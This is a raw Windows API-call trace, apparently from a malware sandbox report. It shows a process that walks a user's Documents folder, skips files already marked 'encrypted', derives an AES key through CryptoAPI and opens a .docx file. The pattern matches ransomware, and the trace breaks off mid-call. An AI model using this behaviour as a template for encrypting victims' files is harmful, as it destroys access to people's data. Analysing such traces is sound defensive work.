HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YjePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PcpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cpmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pmZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.302] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.302] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.303] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.303] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.303] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x415d5310, ftLastWriteTime.dwHighDateTime=0x1d5bb84, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0x7c2240 [0035.303] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.303] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.303] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.304] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.304] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.304] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.304] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.305] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.305] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.305] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.305] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0035.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.306] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.306] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\yjepcpmz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.306] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.306] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.306] RtlAllocateHeap (HeapHandle=0x770000, 